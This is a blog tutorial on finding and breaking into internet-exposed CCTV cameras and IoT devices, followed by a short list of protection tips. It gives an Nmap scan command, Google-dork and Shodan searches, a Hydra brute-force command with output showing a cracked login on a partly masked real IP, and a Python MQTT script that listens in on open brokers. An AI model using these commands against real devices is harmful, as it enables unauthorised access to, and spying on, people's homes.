How to hack CCTV cameras and IoT devices

0
1177

The era of the 5G has emerged and all devices tend to be connected on the world wide web. More and more online devices are now exposed to malicious users. CCTV cameras are the most targeted devices so far, but the new hacking trends focus on home IoT devices.

This article will reveal how hackers are able to spy on people’s everyday life, open thermostats, lights and garage doors remotely. Then, it will explain ways of protection against hacker’s attacks. Finally, a video is shared on how 20 devices IoT were hacked.

Disclaimer

Hacking IoT devices is totally illegal. Do not try any of the described methods without permission. This article is only for education purpose. Forknerds is not responsible for any crime. Aim of the article is to raise awareness relative to IoT and CCTV cameras security.

Hackers’ IoT Targets

The most common devices that are targeted by hackers  are the following :

  • Wireless cameras (CCTV)
  • Wireless printers
  • Wireless NAS and routers
  • Baby monitors
  • Smart home assistants
  • Smart thermostats
  • Smart door locks
  • Doorbell cam
  • Smart light switches
  • Smart smoke alarms
  • Sensors
  • Fitness devices
  • Health devices

What exactly is IoT (Internet of Things)?

According to Wikipedia, the Internet of Things (IoT) is a system of interrelated computing devices, mechanical and digital machines, objects, animals or people that are provided with unique identifiers (UIDs) and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

In simple terms, IoT is when all devices are connected to the internet. The size is irrelevant, it can be a smartwatch or an expensive super-car.

However, there are a lot of concerns about the dangers of the vast adaptation of IoT.

How to find CCTV cameras and IoT Devices

Detecting devices with Google dorks

Search engines use thousands of spider-bots to search, crawl and index the whole internet in a few minutes. During this process, spides bots might encounter and index web servers that belong to IoT devices or CCTV cameras. Specially crafted google dorks are able to reveal IoT devices.

The easiest way to find IoT google dorks is at Google Hacking Database were there is a category called “Various online Devices”. I have collected some of the most interesting Google dorks per device :

374 Online Cameras via Google
374 Online Cameras discovered by Google
Online Thermostat Panel
Example Online Thermostat Panel
Example D-Link Router

IoT & CCTV Network Scanners

Almost all IoT devices run services on the TCP/IP stack that can be detected by network scanners. Nmap  is an open-source software that is used to discover and audit network nodes.

Nmap has countless functionalities that help hackers to detect open ports, what services are being run and the operating system being used. Moreover, it can identify if a target is hidden behind a firewall.

Each IoT device or CCTV camera runs on different port and using a different deamon. It is not an easy task to create a Nmap command that will enumerate all available devices.

My proposed ultra-fast Nmap command to enumerate a vast majority of IoT devices and CCTV cameras is the following :

nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV -p 80,8080,8081,8082,8083,9550
Explanation of the flags : 
-T5 : Timing Template  (higher is faster)
--min-parallelism/max-parallelism <numprobes>: Probe parallelization
--min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies
--open: Only show open (or possibly open) ports
-sV: Probe open ports to determine service/version info
-p <port ranges>: Most common port of IoT devices

The results are really interesting and even by scanning a small subnet, we were able to detect media servers, DSL routers, and webcams.

PORT   STATE SERVICE VERSION
80/tcp open  http    Hikvision DVR web UI
Service Info: Device: media device

PORT   STATE SERVICE VERSION
80/tcp open  http    TP-LINK embedded httpd

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx

PORT     STATE SERVICE VERSION
8080/tcp open  http    Hikvision Network Video Recorder http admin
Service Info: Device: webcam

PORT   STATE SERVICE VERSION
80/tcp open  http
1 service unrecognized despite returning data.

We identified manually all of the unrecognized services and lead to new webcam login GUI.

Computers Search Engines

The easiest way to find IoT devices and CCTV cameras are via specialized search engines like Shodan, Zoomeye, and Censys.

These search engines lets the user find specific types of computers (webcams, routers, servers, etc.) connected to the internet using a variety of filters. Some have also described them as a search engine of service banners, which are metadata that the server sends back to the client.

Shodan is a very powerful tool that should be used with extreme caution. In a single query we can find thousands of cameras IPs :

shodan_webcam
Shodan has indexed thousands of cameras

Computer search engines indexes pretty much everything :

  • Cams
  • Water treatment facilities
  • Yachts
  • Medical Devices
  • Traffic lights
  • Wind turbines
  • Satellites
  • Smart TVs
  • Media Servers
  • Refrigerators
  • Everything with a public IP

All these engines have online APIs which can be used to automate and fasten the enumeration. They support filters that target specific ports, OS, protocols or specific banner strings.

Exploitation

In general, IoT exploitation can be divided into two big categories: remote and physical. In this article, we will present remotely exploitation methods. If you are interested in local exploitation, I suggest checking the video at the end of the article.

Zero Exploitation Effort

Countless IoT devices and web-cameras are misconfigured as a result, credentials are not required to access their control panel. As soon as, you find the IoT IP, you are already in.

No_password_kitchen
IP Camera Without Credentials

Hacking finds even unprotected Puppycams!

hacked_puppies
Unprotected Puppycams

Brute Force administrator panel

Many discovered IoT devices have password-protected administration panel like the following  thermostat  :

NT130h-Thermostat-login
NT130h Thermostat Login Panel

Hydra   is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible. It is considered a “classic” hacking tool as it exists over a decade. It can crack IoT device easily via bruteforce as shown below :

root@kali ~# hydra -t 10 -I -C passwords.txt 73.110.xx.xx -s 84 http-get "/index.shtml"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2019-10-30 19:53:32
[DATA] max 10 tasks per 1 server, overall 10 tasks, 49 login tries, ~5 tries per task
[DATA] attacking http-get://73.110.xx.xx:84//index.shtml
[84][http-get] host: 73.110.xx.xx   login: admin   password: xxxx
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2019-10-30 19:54:21

Explanation
-t TASKS run TASKS number of connects in parallel per target
-C FILE colon-separated “login:pass” format, instead of -L/-P options
-I ignore an existing restore file (don’t wait 10 seconds)
http-get attack method for basic HTTP authentication
-s PORT if the service is on a different default port, define it here

Always use Complex Passwords!

Hacking IoT with MQTT

According to Wikipedia, MQTT is an open OASIS and ISO standard lightweight, publish-subscribe network protocol that transports messages between devices. It is designed for connections with remote locations where a “small code footprint” is required or the network bandwidth is limited.

mqtt architecture
MQTT Architecture

MQTT architecture consists of clients and brokers. The broker is the node that receives all the messages from the clients and then routes the messages to the subscribed clients. The nodes that send information to the connected brokers are called publishers, the broker is responsible to forward the data to the subscribed clients.

As we are already mentioned, it is easy to locate MQTT brokers on the wild via network scanners like Nmap.

$nmap -T5 --max-parallelism 10 -P0 --max-rtt-timeout 1s --open -sV  -p  1883 <ip>

As soon as you locate a passwordless broker, you can connect and subscribe to all topics by using an MQTT client. A client can be created even by a python script using paho-mqtt library.

import paho.mqtt.client as mqtt

def on_connect(client, userdata, flags, rc):
    print("Connected with result code "+str(rc))
    client.subscribe("$SYS/#")
def on_message(client, userdata, msg):
    print(msg.topic+" "+str(msg.payload))
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.connect("<Broker IP>", 1883, 60)
client.loop_forever()

In my case, I will use my favorite MQTT client called MQTT Explorer to connect to one of the discovered brokers. My client will automatically subscribe to all available topics. MQTT topics are a form of addressing that allows MQTT clients to share information and they have a hierarchy as shown below.

MQTT Explorer
MQTT Explorer

The leaves of each topic consist of data produced by the sensors-devices like humidity, motion, battery, etc. It is clear that a passwordless broker is a high-security breach but this can go even worse. MQTT protocol supports message payloads to update the status of a remote device. For example, we are able to switch on the garage lights remotely by publishing a relevant request. The options are countless.

MQTT Garage Lights On
Remotely Switch On Garage Lights

Hackers can easily control all Iot devices via an unprotected MQTT brokers.

Video: How to hack 20 devices in 45 minutes

How to protect your IoT devices

There is not a golden bullet when it comes to IoT protection. The following list summarizes the most important ways to protect your IoT devices.

  • Always buy IoT brands that focus on security and release regularly updates
  • Keep your IoT device  firmware and software up to date
  • Enable authentication of all administrator panels
  • Enable encryption for MQTT connections
  • Enable two-factor authentication if it is supported by your device
  • Always use huge and complex passwords
  • Do not use the default ports of the application
  • Do not use default usernames and passwords
  • Disable features that you do not need
  • Do not publish internal servers on the internet
  • Use VPN to hide your servers

Conclusion

Security is a big challenge to IoT and CCTV cameras. Cyber attacks will be increased and they may focus on smaller devices. Personal freedom is at risk as attackers can reach you inside your house. Security professionals must understand new technology challenges. As time passes and new technologies emerge, new attack vectors will be found and will be exploited by hackers.

LEAVE A REPLY

Please enter your comment!
Please enter your name here